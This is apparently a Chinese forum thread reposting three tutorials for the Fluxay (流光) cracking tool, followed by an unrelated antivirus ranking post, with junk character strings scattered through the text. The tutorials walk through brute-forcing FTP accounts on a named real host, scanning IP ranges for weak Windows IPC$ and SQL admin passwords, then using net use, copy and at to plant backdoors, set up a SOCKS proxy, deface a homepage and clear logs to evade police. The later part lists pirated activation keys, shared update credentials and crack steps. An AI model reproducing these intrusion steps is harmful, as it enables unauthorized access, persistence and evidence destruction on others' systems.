请问流光怎么用

流光教程

流光教程一 ON,Z$G*^ m*U

许多新人在用流光的时候不知道如何下手，小榕论坛来讨论的也多是“如何添加用户”这样的初级问题 ：），就抽了点时间写这个简单的教程,希望让新手快速入门。 $Xn3l E&e M'fl7I

h4r3|)V"S&y

我个人认为流光的破解可分为5大部分： #?c"J4l'uLMum

nZX'vdE3D4{+A6g 一、POP3/FTP/…探测

Y D Z"Aw9e

N z*l6A8nuxjAZ 二、IPC探测

+v8} ]2i X r3{V ~7cNNZi:W2u

三、SQL探测

0b*[1x8g'U #}??}8Hx8O

四、高级扫描 4v`I'\ D\Z

?\)r+x!e-q)j bf

五、其它 … 9FZ%J-tE6c(}+N8v

Q H^@4VX'p 因为开发时间的原因，上面的探测模式略有不同，所以分成了四个部分，本教程说的是第一个部分的探测。后面的探测模式应该属于流光的高级应用了：） Z:X%?#a+y A&V

6JO v+] f9jS,m x 下面我就简单说一下基本的破解流程： $~S @O%r2D

z|+|)qsq BC 1、你得有流光，我这里试验用的是流光2001.FOR Win98 中文版.FOR Win2000的也可以。 nQ4]v-Az9NCD*_7G

Q a:x7c.Kf4u 首次启动流光，看到如下图的界面： :x2jWr0nJ+x

"d)zkP!\ h$a ]|&Q0uro

X-U9[zO"kM

首次使用是要注册的，不过不要想到花钱：），小榕只是想看看有多少人用他的流光而已。你可以填好相应的选项，然后点发送即可，如果发送失败，你把发送服务器换个就好了。

1Dy*^7CM4y4jj7BA )[sRpa7_/w

SX j@_H

E+U4xtR:@5EYt/CJ)}

因为重装系统，我也不知道我发了多少次了 ：（ 。如果不想注册，就稍等下面的进度条走完，点稍后即可。如上图：

y\Bs9Np9~9f%Ol`9F F5OGX-X?3c@U9L

tNFQDgH-x -s(Z5w5FEr@p[

H9ed$^"N[*P"X .A$}Vtx6q2sJ

2、找个站点，我选的是中华网[url]www.china.com[/url]的主页空间（home4u.china.com），探测方式：FTP。

N |B^Fk4Y +I V+X lf

有人常问扫描端口有什么用，其实作用就是你知道他提供了什么服务，然后可以采取相应的探测方式来获得PASS了：）我们知道主页几乎都用的FTP上传，我们这次就用来测试一堆用户名，看看有没有弱智的密码，呵呵，如果有 hacker.at.china.com 这样的，也不妨霸占为己有：）

4n9N OnqZkd

7W NmEQ5ZHw 3、加入要破解的站点名称：右键单击FTP主机→编辑→添加→输入 home4u.china.com →确定！ \:] B E'MGw

mZy9yF:qpE8K eJ5L!I a#C4I1O*w

yU&CX#X$x,r

CrN Ap

!zS,@}0m/P,V7} 4、加入用户名：我们要破解的是一堆用户名，所以要加入用户名的列表文件！我们就加入流光目录下的 Name.dic ：）右键单击刚才添加的主机：home4u.china.com → 编辑 → 从列表中添加 → Name.dic → 打开

g$d.k H-W 5itXRHu%?8G

7_bvg'fU

C&@2H W,]S NO%yOw-Y.\*E x hJkB6l

1lv0{`!~d+e%hU u

然后会有“用户已存在列表中”的提示，我们选中“不再提示” → 确定 。如下图： 6A ~:uu X3eh

$G7Z%~ nw

wVF5^tB#yT#k%Nf7c

CkjR-X[_@-b 用户名太多，我们可以用点主机前面的“—”号把用户列表缩起来，如下图：

+l3^8TC0R3Ml

7Q,FP oe`"[mk Z-m1x^kB8j$Ej]

!V8WoCEr

大家注意名字前面的小框中必须有√要是没有就无法探测了。 Xcj)[ PR

\JL,X5W Cv Lv o3G

5、有了用户名，我们就可以进行探测了，大家会想到怎么不用密码？其实流光有个简单模式的探测，也就是用内置的密码”：“123456”和“用户名”来进行探测，因为这样的密码是使用频率最高的：） 9r)?e bM4Y5y#pixy

{M JrO#j@Hmg_ 当然你可以修改这个简单模式的文件，加入你认为弱智的密码。方法是：单击 工具菜单 → 模式文件设定 → 简单模式探测设置文件 → 加入你要加入的密码 → 把设置文件存盘！ OQhI^,O

F Q_~.k ODI 下面我们就来看看这一堆名字里面有多少是用“123456”和“自己名字”来作为密码的。

}S~5M{)E

EbUz RqHZ 探测 → 简单模式探测！

u$b'n(jR,Ik0h@

b(P*|@-s,U!PuO.{ hm.T2l*t},|

T ]q&I2q~

3F_(W(C j?\

M s+q O3L$s 探测中…

:fJ+AT@S}&u

y+g.Bl C-_6x"U@X+M1]B

$k.S*q!g.] X

K]e/y^Ii

:]^YE/A$fB#W

1M+]t+eW QAM 6、探测完毕，也看到结果了，流光会问我们是否查看入侵检测报告，不想看可以选否。

*sQ!cR:C'oms

w I`&x+y

|I)vh7?xc|

Hga+B5r:vt#Je 报告的画面

2z)S"nS @l4~#VM

ydx!w*O b| {?Cb1ZDZ

\.i c`h xc 7、如果要探测的是一个用户名，就需要添加字典、或者密码方案。方法是：右键单击解码字典或方案 → 编辑 → 添加 → 选择一个密码档即可。 ]}E5? J l/@

J$``IO#R3i 以上就是流光的一次简单的探测了，事实上这些功能只能算是流光的2.5版的功能，流光2001增加的IPC/SQL/高级扫描等功能，使流光更加强大。如果你对这个已经很熟悉了，相信你看流光的HELP就会很快的学会其它的使用方法的。

9\W i R-JUV j {L k/X |

关于用户名的问题：有人觉得自己加入的用户名不一定存在，如果不存在岂不是白费了力气？这点你大可以放心，流光会进行验证的。而且现在注册的用户入数之多，想个没有的名字都难，不信你随便敲个试试。

Vi~PLWdY UYk5@Ou

关于字典的问题：流光可以使用字典方案来探测，当然你也可以生成字典，有的新手在作练习的时候不知道怎么做，你也可以用记事本生成，每行输入一个密码，存盘后将扩展名改称.DIC，流光就认出来了：）如果你连扩展名都不会改 ：（ 那……

wp-w7J"Ga)\af+p

L/\Di/`@y X#c

2a2H~/f9W[,L o r @m F ~

只要是学习、谁都会遇到困难，我也是问题多多，还得向小榕、EKIN讨教，欢迎大家多交流 ：）

]J+|3{,mJ-k#j!M

0W H%X$sp/@ a

u3I4L%S9n btd

P#m)Zqs

`1_s"W)BD :c"{n_&r]

待续……

香烟 2007-5-28 11:07

流光教程二

很长时间也没有写什么东西了，这源于我的懒惰和生活缺乏激情。我的记事本上一大篇都是欠朋友的承诺 ：（

l P8M"F5M:b2|0k !J:Ix~R h

你既然看到这儿了，就在听我牢骚几句吧：）搞安全应该有正确的心态，别以为你会了个工具使用就可以一步登天。

{B \[y0x\/u 'a+g a S)tUc

交流、学习才是最重要的，把自己心态放正，无论我们是高还是低。

R p4O)Z'qT#L n.Wxu3Zk0x

5F i GX!xJL+Z#`dN

今天要写的是流光的IPC探测： \,`P_`?

Ev b n+jq 一、目的和任务： +@&g2Bs/dp+i

M UA0P@ Ot pu!?DP

1、用流光的IPC探测获得一台NT主机的管理权限，并将这台主机做成一个跳板/代理。

V |nnP_gTX] 2、学习IPC探测的相关知识。

!gnaW4v,Ft9~ 4X-R0J'U:\ |td

二、探测流程：

E],@9y/b Bm#a~ S8HD#?%X

1、你得有流光，我这里试验用的是流光2001.FOR Win2000 中文版。FOR Win98的不可以。因为IPC连接功能是NT/

X.Q#mG"Vj^S }+T!J (U:s,o|P1F\I2p

2000提供的功能。而且流光FOR 2K 要求你的 *** 作系统得是NT/2000，否则流光启动会失败！

+DfdoX})J (~\Q.` v \&|7\3o

什么是IPC：

l2E6WK0@4b^

d,d-Txkrx!miLM IPC是指"InterProcess Communications",准确的说是ipc$，是默认的在系统启动时的admin共享。 .p gsh Y_E

S#M+Y+c^+\_|

IPC$是Windows NT/2K中特有的远程网络登陆功能，它的特点是在同一时间内，两个IP之间只允许建立一个连接。 (nV6s7f4k

RE u*@!T 注意，你试图通过IPC$连接会在EventLog中留下记录。不管你是否登录成功。 g/?"o[We AvE w

2\"D,R+t6uz $s e5mP6@^5v7t

:s#n8[q4rA g

可不可以通过IPC$暴力破解密码？当然可以 ！ 不过，是不是太笨了点 …

#p"U`9F9v8lv,P

xK8X$rAm k{8K*G7q5R

2、首次启动流光，会看到注册的画面，具体 *** 作请参考本人第一篇教程。我们在主页面上可以有几种方法来通过IPC

sI)[at

M9ly3t p 探测获得管理的权限。这里我们要作的是得到一台跳板，那么就可以用命中率高的办法来探测了（测试一堆IP来得 A:q6EkB5_v

nLa5Q*pxL

到弱口令）。

"S[hr4]W)@

9Q$?5X4w(a 在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项，或者直接按Ctrl+R。

u ~ ]` W6C 图main1 4H%SmP u3`-g

7\0v7S7S^ue

+k.h]7}vr4A*| "B^XKZ0LR"_-H

图main2 Qmm _ Lh7GV

-XCq2S~ cQ

EG"miTgi+u

6N5_Vp!Y0@ws0r,E 3、出先了上面的小窗口，输入我们要破解的IP段，我们输入了来看看。图main2我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令，这样可以加快扫描的速度 ：）填入IP，选择扫描NT/98主机 k3P.gQ$p

.ZA F#w X 4、探测中…… （start1） %_,sn#Gq3Y`

!Gv?@Gt0|1t_D

（注意如果你要探测的是流光保留的国内的IP段，会被禁止的，也就是探测的时候信息栏出现"IP保留"的字样） 6rb2ZLn9n'?3F

M.KoJ2c

!dnP6meD%C iCBt)hvs!bm)v

6e(JmneR 5、这是扫描到的NT/98主机列表：（jg1） 9yd R9V @c E G

4z zC1Kn9GOP ?

1sa _W Om9l

'U0x?U mk ^2G5j

6、没有扫描到常用密码：（

2\"r'i'kA&no 6KgORI"y t}-T$J

HfegS j c,o9v*LQ)K:F

7、就不要查看报告了 ：… &e2N(Ki,t \&WM@FO

} z'p-S%yYu4W

WU9g._w/S5A

\:kr_8_7gA)A 8、有了不少NT/98的机器了，正式开始IPC$探测：IPC$主机－探测－探测所有IPC$用户列表。 $P8E]3\9B K2pg

AP#[(N W5P4Y

%n)T h9qO&[k"U3y P Xe

)g2tM"l-^)A.s8N} 9、注意下面两个对话框的设置：全选上，我们只要IPC$管理员的弱口令。然后点选项

Y i:~C{DP Nzy _x3wxL

(C0M4X W@vO

"mx-?qz]%n4z 10、点“选项” ：为了加快弱口令扫描速度，这里的两个我们可以全部取消，比如下面的那个，如果对方禁止列出用户了，我想对于一个网管来说，弱口令可能性也是微乎其微。 T1@+Z\q _'xbU

3U+n)L1?1ZHE0E

?]*\9K5\6{4o2{3a l8_W

-~K+d6^]%w mg x1_fw[

11、探测中……

L|9Wl/`9i!w

iX5~o5y"E C+@ /l8f#OxW:@Q

FL?HKg/vQ

12、有密码了：） vh3tv/zll,p

xm{Z r+L3{~"k

y1pg2x l z:P l(f6y2[2vSYK,]

13、又出现了查看报告的窗口，看看 ：）

#Y0U fH M@,@Tf x

@^%Z0v(t [| 9m-`)X-P(Q#o,I

C8E [,F W

14、有远程主机的管理密码了，我们剩下的就是想办法控制它了，有什么好办法么？ ：）有的是 ！自己看看工具－ i:h0{(AGCO5O

H.j+f!XFp8o 菜单下的IIS远程命令:)是不是很简单呢，我以后在说，今天还是先练习net 命令吧。

}6Pb \+u W#C %V%`*@$m*u"pH&P

15、黑了他 ！

w2K#cu"e}

@2]*w5d.Y+V'D8bB 开个dos prompt 执行如下命令，本次用的例子如下图。

1v'kePX4a-r

)z9N,s5hb-AaH_ 1、 net use file://对方ip/ipc$ "密码" /user:"用户名" || 建立远程连接

6sBdD1z3l p#T(o_p5ve+PSqC

2、 copy icmd.exe file://对方ip/admin$ || admin$是对方的winnt目录 ：） 这里文件多。

*Q1T*l,e"K%_/E

-Pr:z%mOn/L 3、 net time file://对方IP/ || 看看对方的本地时间

{7J{ H.|:f!oy Q\M

R gYi}x+tO1j&_ 4、at file://对方ip/ 启动程序的时间 启动程序名 启动程序的参数 || 用at命令来定时启动程序，在这里我们用soon这个程序来做也可以，它可以取代 3/4两步。

Luw UB @)L2~fy S0@lz

5、 telnet 对方ip 端口 || 1Q&LR1Z3W/h }

{K9x J4s-U(K%C-_*c

6、输入pass （如果不是用icmd.exe，或者没有设置口令就不用了） ||

8Hv3k?)um1o@~`[ QF@G~%gZ8jF

7、在开个窗口，继续copy 我们用的东西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe 1p"?+X1LN$K~4k

za1\5E[:?:j5f

图cmd1

-MRgW,~F/cx

q\&Vh |,P #o&n8N/R` l%RB

9O2i,ZZ ~/~,b kA%c4f-h!v Q 图cmd2

Nl#I\*s E V

Ui HR"C%X

L\#~A-g])_$o

Z(GiiC 如果我们真的想黑了他，只需要把我们的首页文件覆盖目标的首页就ok了，我们可以通过dir /s default.htm或者dir /s index.htm 来确定对方首页的为止，一般是在X:\interpub\wwwroot\ .

%\YUsC5z2th2w j2WwPs*C:@

假如首页文件是default.htm并且在c:\interpub\wwwroot，这样:copy default.htm \\ip\c$\interpub\wwwroot n{*{]4W0F4W#M

_s8c8P\B K

下面的图有演示 t2~5l:i'v,j

.T'l!h)XGK_-FN^ 7、其实黑人家是很低级并且没意思的：（，我们最好是物有所有，作成跳板吧，今后干活方便点：） /S.S,_? ^"L-y

F&D(HL ^ 执行我们copy 过去的ntlm.exe ，取消验正。在给自己留个后门，比如提升guest的权限，或者其它的后门工具，这类东西多了自己选吧，看看杀手copy的那堆东西 ：）

Gk,Q@ X"n\m us E

} ^\W(a G V,S

Y1aU j9t ^/n[7K

6Z`!q!Dx-W\ 8、做个SOCK5代理玩玩，用在QQ上不错喔： cq&Q `k+h8m

1G1}lX'S(F

执行我们copy 过去的sock -install，net start skserver 看看用在QQ上的效果：）

1C.P7F6?"mY

[7D&n&l|@

*b wh ?}1O/SW

0s(r2G:K9_A\kB/iw 是不是没有看清上面的步骤呢？ \$u1Ll]qJ,\Q(e

1QG2S/zq4_0DK wN 下面是我telnet 上去后所有的命令：）

M)M k|.Z $me*bZRZr

0c0Zw8X7}I

$pF g1^.A 9、还能做成其他的么 ？ yLP4s#w"\5i4|

/}2}H6h!jc/|oA

当然了，只要你有时间，并且愿意做，我曾经偷偷的把自己的主页放到人家的server上，速度快、空间无限，嘿嘿 ：）

A&b!W2`My^#v

5Lj} O`qG 10、日志清除，断开连接 ： dB#Va F~w f

"x)Op(r[`9D

执行我们copy 过去的cl.exe clear.exe 都可以清除日志，比如clear all ：清除所有的日志。然后在断开连接：net use file://ip/ipc$ /delete

FNwL3v

4J$lx'Xztp 这步我认为是必需的，尤其是在一些有争议的站点上，或者是国内的站点，除非你想让电视上报导XXX地区我神勇刑警捕获弱智黑客一名XXX。 'rKIh8G V(V

$F&tj+\W6f

在网吧写完 ：（ 错误之处请赐教。 ,f^#B#yg3u J#q

&uY/q~3hN A~ 只要是学习、谁都会遇到困难，我也是问题多多，还得向小榕、EKIN讨教，欢迎大家多交流 ：）

香烟 2007-5-28 11:08

流光教程三

关于IPC$的终于写完了，那个该死的网吧，闹哄哄的声音声声入耳 ：（，你可能想不出，IPC$探测是我在网吧完成的，而且那个网吧还有公安部门的网络监视器，这东西很有意思，好像是VXD调用，和IE运行库集成到一起的。哪天非弄来研究一下，说不定一款别具特色的木马就问世了 ：） PY{ S+Fy!Yo

%J@2J!QlVW7uA

不知道你看完前一个教程有没有要扁我的想法。。。。

zv'yw,\!msU

R7dr8gLWpd 交流、学习才是最重要的，把自己心态放正，无论我们是高还是低。 jNd|C c%|]

\#O"o7Nd

+ER[ x`v'r 今天要写的是流光的SQL探测，顺便说说ipc$补遗和其它的探测手段。

sI!\~*F3~

hmw.N Eer-Ca+t 一、目的和任务： 1Z%CUh!v:@i DZ

/]a E)Z4G#].e

1、用流光的SQL探测获得一台NT主机的管理权限。 dU/[-d9JI'k

2、学习SQL探测的相关知识。

^q$f5F k od qJ 3、IPC$补遗和其它…

$n j6n$V yl 二、探测流程： ,y?8gzw)l

,F7ajG@:[ 1、你得有流光，这话不用在说了吧：） rcHF&O4w|C

Ny|f\X

什么是SQL：

2?Ek\+Z0G"E \f"n0Y0? x+F^]6~ H9r

SQL：微软开发的数据库，专门用在微软的OS上，功能类似Linux 下的Mysql，晕……，到底谁类似谁啊？有时间

7K$e.k Jbp (wi4PW6s9pU8e/C*H

去看看SQL的联机手册，说的很明白。

&W8A4of)?)t)U

'[email protected]#Dh@*Ll SQL服务程序支持的网络协议: Nl*`yf ?

.G0y)?F,R$`rH Named pipes :使用NT SMB端口来进行通信，存在被SNIFFER截获数据的危险。

YB5I7`ME E9v4D

-If}ru \ IP Sockets :默认状态下开1433端口，可以被扫描器探测，存在被SNIFFER截获数据的危险。

:b3L{~-S Xl6}E!]2c o3C]

Multi-Protocol ：客户端需要支持NT RPCs，数据加密。 4T7f3e?{1`[a

JJq(S:o9`\,nk

NWLink ：存在被SNIFFER截获数据的危险。 5{/AhH3_F jv*LM

%^3qxM8h:\qZ `W!y!m

AppleTalk (ADSP)：存在被SNIFFER截获数据的危险 v"t3N"e DZx

7y3r KD UkGZW@ Banyan Vines ：存在被SNIFFER截获数据的危险 :t k6Z7RZW~

Bkh{3_/y9k7D p

在Internet上，95％以上的SQL Server 采用的都是IP Sockets协议，流光探测的就是这个协议默认的1433端口

MA'vxIjn.L"V7E

([Z8u)b[1N)l[xjf

vI'Go'}dF E q.j 2、我们要获得SQL 主机的管理权限，那么还用命中率高的办法来探测了（测试一堆IP来得到弱口令）。

Hz W2VB"Pq

.~8U6@/\?H:{ 对一台固定主机的探测等我下期的教程：） WUTp!~-M:K

s)XZh4Lz

在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项，或者直接按Ctrl+R。 ~F)_2mc1J!_2k3o T%@

图main gS:]_4M$^

)[MQp j

V_0@sF~

$yX0tZTX'l(u(b

I0i)Q2cu2iv/ul

3、出先了下面的小窗口，输入我们要破解的IP段，我们输入了来看看。（注意如果你要探测的是流光保留的国内的IP段，会被禁止的，也就是探测的时候信息栏出现“地址保留的信息”）

iO~/qo|p4\ 图inputip

@,l6S/mi6p ,S4^XK-rb

W7i}tF,?` H B j1jWF:~|MV

%{]-Y`(wR-[cn 4、探测中……

5hB-u.aXGA Xb

bm!hl]-Kn|1F5B 5、有密码了：） 图psss 1→3 &I*Xett-^ wY+d:N(Q

`,Te`#p` yc2EJ*i7x%|Qu'e

t:` V9^]

Ee+x-vaW ]F

6uR8p)Crk5\7?

aH0cgLClEGp9I

*{(S&hN:n

2H]6I3xJ4V | ip#^/H] My-I g7Z

6、下面我们进一部获取管理员的权限。 4b.RQK4L

用SQL 客户端去连接主机，没有装SQL :( ……………… 没关系，流光自带了连接的工具，以前我一直都是用的天行的工具SQLexec，但现在可以不用它了。 A d-i9MC3O!oZ1g

R`s AB$u@A

打开菜单 工具 → MSSQL工具 → SQL远程命令看看：） f8jZ]/J

图tools

| q^%g{$H|8p6~

D~ fE/Yj'Hyy G4k#X,br(h

+sjL t+N ]j 图SQLcmd 7`^3d4Kd&Wt\4ir2a

@0|#Zh*I`"U

2^M*O8rLD

zL$n*Gl 4nsB*l+?X

7、获得管理权限、增加后门

s+Ex MD&zj*y(N 图cmdline 6R^ {.HtkOe g

5x%G7L_ zLM A

L0Y?2b:sy

8HNh#wk.f

0f-}8s(Z%Q gO

{9Rhd aD 8、现在我们已经是管理员了：）

3l"eM1G(e.?(U { y.M tn

以前我们是用at命令来远程运行程序，今天顺便说说流光中自带的“种植者”，看看 工具 → nt/iis工具 → 种植者，我们来用它远程启动icmd这个后门。 xW9{5d lp

[email protected]{

图lookcrop 5q l.c.nM6k

&H V} g.e}_O

oS8D'l&L

l e9G1a~(wy

图crop &V8XMu }\0t%_Sd

{j qEC#?Lc/W

)\$_k,u-K

H(P1e)Ga7E 图cropend d'VHG6@yu

m*XX6A$b N fe3A9u%B]Sk

-VLFBb*N 一分钟后登陆看看：

2@'zrwIB.z b9f]V4V/Ys"q#gr2H

-L-e)L,m yQG1?c

@x3A)}U$I%k1mA

.Y,EMOF

6QNC4w6rs't

7O2l(XTTbQp

9、再说说 工具 → 模式文件设定 → ipc简单设置文件 。

0T:s(_)^CdaQt

3}.YUYvi)g8N 图mode U k/d&bcw'e4m

Da \[ j^2m

8eQI H3er!\$R

H-QJ/njtF#c

#v(HkA%{,I9E

@i/V5V`u&o “工具”中其他的项目和上面说的两个类似，就不多说了。

:AL A"sF)g\ H2K

8{7e(z[(~0j']zF v

#Rn3O${]&K"h9v NR 10、日志清除，断开连接 ，参考IPC探测，记住可以用种植者远程执行命令。

Q]d%H Q Of5b ot-m mFnM8a#Cv3A

!oSO.LF|

关于IPC$补遗：上篇对与IPC$探测的文章，写完后觉得还差点什么没有说：） T)Rlz*v#@gC

b8n2^,y}"Ui1` 1、我们虽然只探测管理员（admin）的弱口令，实际上在真正攻击中是任何一个用户口令都不会放过尝试的，因为我们获得了

E:mJ O#P0M,^EAJ !aF C??5k!qh9CH

普通用户权限后可以提升权限，事实上，一个普通用户的权限在＊nix攻击中是非常重要的。 lCkc)W@m

MN0f:GT%x

2、获得口令后，攻击手法多样，不要局限于我的例程。

XJWu+Q |/U5B/Ffco

3、如果对方没有XXX怎么办？，这类的问题去看看我以前整理的流光FAQ。 v!D+RH z K

'Kt{"S(a?rM

关于其它探测：

O)},m1]u A1J

]6H {0^7C$?U 玩玩3389 ？ Lxk8[l8F

Dc?~'^#mQ/c3L l

首先终端是WIN2K提供的功能，所以我们在扫描的时候就要选择 “NT/98”的主机，在得到主机列表后自定义端

4]vE0~ b/o CY

6J:XH WY{AN"qu 口来扫描这些主机的3389端口，然后……

7ED.O4CM/]NZ 8l3m-J9x'?*B

玩玩cisco路由器？ Y'}L4[x-}:qt

&|7l5x\nm 自己想想怎么作 ？要是想出来了，我的以后的教程就不用看了 ：）

4?` [wxXB"o/}~ y!GGM X}\(H:|'`

1_h(r5b"V1E3ht]%j

G6RK^XE-u 明白了么？我说的意思是要灵活使用流光：）

瑞星相对金山好,但是都不怎么行,建议使用外国的货:

世界排名十大杀毒软件全部分享哈

世界排名第一杀毒软件BitDefender

2006年世界最新杀毒软件

排名

:

金奖：BitDefender

来自罗马尼亚的老牌杀毒软件, 二十四万超大病毒库，它为计算机提供最大的保护, 具有功能强大的反病毒引擎以及互联网过滤技术, 为你提

供即时信息保护功能, 安装方便, 并且支持在线升级.

《安装主意：安装进度条过程中会有一段等待时间很久，这里不是安装失败，而是杀毒软件要准备更新至最新版本，请不要停止安装，笔者我测试时第一次安装就是以为是错误，强制停止了安装，好在这为‘世界第一’想得周到，自己删除以复制出的文件》。

实际测试：杀毒过程CPU占用率平均65%，网络资源但是占用比较厉害，界面比较俭约。

******************************************************************************[/size]

BitDefender 9 Internet Security Build 9，10月27日发布，这是罗马尼亚的一款网络安全组合包，包含反病毒系统、网络防火墙、反LJ邮件、反间谍软件、家长控制中心 等几个安全模块，提供你所需的所有计算机安全防护，保护你免受各种已知和未知病毒、黑客、LJ邮件、间谍软件、恶意网页以及其它internet威胁，支持在线更新，全面呵护家庭上网安全。SN：82E04-6AFBA-1DA94-7B539

测试杀毒软件的性能代码:

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

把上面这段代码复制到记事本里，保存为文本文件，然后静观杀毒软件之变。

特等:复制完代码后便提示内存有病毒

优等:刚保存完就提示病毒(或者直接删除)

中等:保存后几秒提示病毒(或者直接删除)

下等:需自己启动病毒扫描查杀才提示病毒(或者直接删除)

劣等:无论怎么扫描都无法提示病毒(或者直接删除)

下载地址

世界排名第二杀毒软件银奖： Kaspersky

就是“臭名昭著”的卡巴斯基，是世界上最优秀、最顶级的网络杀毒软件之一，查杀病毒性能远高于同类许多产品。

（激活码:WNM8B-1RV8R-3X6VX-U7QUC，笔者授权key没用的，还是激活码好用送上一个，经测试能用）

实际测试：谁都知道，老卡就是‘卡’，杀毒过程CPU占用率85%，这是没得说的

软件简介:

1. 整合全系列汉化包为通用简体中文包,可以安装支持所有

Kaspersky

6.0.1.346产品

2. 保留英文版本,不采用替换法. 你可以用按键盘F5转换卡吧界面从中文到英文,或者F12键从英文转换成中文!方便您的语言喜好!

3. 美化字体

这个版本的汉化包我们做了很多努力使其完善,可以说已经不单单是汉化的范畴了.程序内不带插件捆绑,但弱弱的说有一个IE首页设置小广告.你可以选择取消或者在接受后自行改回. 希望大家能接受,因为这不是我一个人的作品~~~

汉化人:雅诗(Kaci)+星风雪(汉化新世纪成员)

版本历史:

2006.07.19

Kaspersky

6.0.1.346 全系列通用简体中文包

2006.07.13

Kaspersky

Anti-Virus for Windows File Server 6.0.1.346 简体中文包 v2

2006.07.13

Kaspersky

Anti-Virus for Windows Workstations 6.0.1.346 简体中文包 v2

2006.07.13

Kaspersky

Anti-Virus 6.0.1.346 简体中文包 v2

2006.07.13

Kaspersky

Internet Security 6.0.1.346 简体中文包 v2

2006.07.12

Kaspersky

Anti-Virus for Windows File Server 6.0.1.346 简体中文包

2006.07.12

Kaspersky

Anti-Virus for Windows Workstations 6.0.1.346 简体中文包

2006.07.12

Kaspersky

Anti-Virus 6.0.1.346 简体中文包

2006.07.11

Kaspersky

Internet Security 6.0.1.346 简体中文包

6.0.1.346是目前KIS 6.0的最新版本.其稳定性已经超越正式版(6.0.1.300).所以我们推出本版本的汉化.

下载地址

[color=red]世界排名第三F-Secure Anti-Virus铜奖： F-Secure Anti-Virus

F-SECURE可能知道的人很少，别说用的人了，呵呵。我自己现在用的杀软就是这款，其实这款杀毒软件名气是相当响的。来自芬兰的杀毒软件，集合AVP,LIBRA,ORION,DRACO四套杀毒引擎,其中一个就是Kaspersky的杀毒内核，而且青出于蓝胜于蓝，个人感觉杀毒效率比Kaspersky要好，对网络流行病毒尤其有效。在《PC Utilites》评测中超过Kaspersky名列第一。该软件采用分布式防火墙技术。f-secure 曾经超过Kaspersky，排名第一，但后来Kaspersky增加了扩展病毒库，反超f-secure 。鉴于普通用户用不到扩展病毒库，因此f-secure还是普通用户很不错的一个选择。所以我用下来的感觉就是F-SECURE的综合能力可以排第一名！但是这个软件也有不足，就是进程太多，要近15个进程，呵呵，谁叫它有四套杀毒引擎呢？不过也够安全吧。进程虽多，却一点不觉得卡！

F-Secure Anti-Virus 2006 (PYPC)不带防火墙版:

提示安装中文简体中文汉化补丁一定要关闭F-Secure Anti-Virus 2006 ,

在安装汉化补丁时要把目标文件夹更改为 C:\Program Files\F-Secure Internet Security 当然这是6.0的汉化也可不安，毕竟以能注册升级了！！首先解压安装，安装时选择试用（如果安装过程问的话），安装完毕，先不要重启。拷贝破

解补丁到安装目录如：c:\Program Files\F-Secure InternetSecurity\backweb\4476822

\Program并运行给文件PExTNBPlugin.dll打上补丁以去掉在线验证。然后重启，

还要进行注册的第二步：用注册机生成序列号注册即可（就在主面板里可以找到授权

类型改变即可）此时要求完全安装，点同意，安装完毕，重启。此时还不能在线升级，再重启一回即可！

F-Secure Anti-Virus 2006 注册 注册机.rar有注册安装说明此方法同样可用于F-Secure Anti-Virus internet 2006和2005

[/color]

下载地址

世界排名第四杀毒软件PC-cillin

趋势科技的 PC-cililn2005，太容易安装和 *** 作了，非常适合那些对杀毒不太了解的人，而且它还整合了防火墙、防病毒、PDA、无线网络安全防护于一身（也难怪，趋势本来就是企业级网络安全,自然会在网络安全上多下更多工夫）。每天会自动升级病毒库，为发烧级的懒惰网民提供了很周到的安全服务。最重要的一点是，让你感觉不到它对系统运行有明显影响，使你的电脑不会因为配置较低而无法享受到一流的安全保护！

下载地址

世界排名第五杀毒软件NOD32

国外很权威的防病毒软件评测给了NOD32很高的分数。产品线很长，从DOS，Windows 9x/Me，Windows NT/XP/2000，到Novell Netware Server、Linux、BSD等，都有提供。在线监测功能严密，防火墙可以预警尼姆达，并可清除之。可以对邮件进行实时监测，占用内存资源较少，清除病毒的速度效果都令人满意！

实际测试:杀毒过程CPU占用率平均50%,测试中还发现了病毒（汗！！）

下载用的

AV-2907375

n1wpybs9b4

升级可用的ID:

UserName: AV-3289554

Password: 68p892vp05

UserName: AV-3279968

Password: foauomiimb

UserName: AV-3292593

Password: ec8jgtvywd

UserName: AV-3292626

Password: mfhv7pwjg2

UserName: AV-3226910

Password: fpegcmyst1

Username: AV-3220791

Password: vc4j1egd32

下载地址

世界排名第六杀毒软件McAfee VirusScan

全球最畅销的杀毒软件之一，McAfee防毒软件, 除了 *** 作介面更新外,也将该公司的WebScanX功能合在一起,增加了许多新功能! 除了帮你侦测和清除病毒，它还有VShield自动监视系统，会常驻在System Tray，当你从磁盘、网络上、E-mail夹文件中开启文件时便会自动侦测文件的安全性，若文件内含病毒，便会立即警告，并作适当的处理，而且支持鼠标右键的快速选单功能，并可使用密码将个人的设定锁住让别人无法乱改你的设定。

下载地址

9.17新增加 v8.0i Patch 11 补丁包

世界排名第七杀毒软件Norton AntiVirus

Norton AntiVirus 是一套强而有力的防毒软件，它可帮你侦测上万种已知和未知的病毒，并且每当开机时，自动防护便会常驻在System Tray，当你从磁盘、网路上、E-mail 夹档中开启档案时便会自动侦测档案的安全性，若档案内含病毒，便会立即警告，并作适当的处理。另外它还附有「LiveUpdate」的功能，可帮你自动连上 Symantec 的 FTP Server 下载最新的病毒码，於下载完后自动完成安�%

---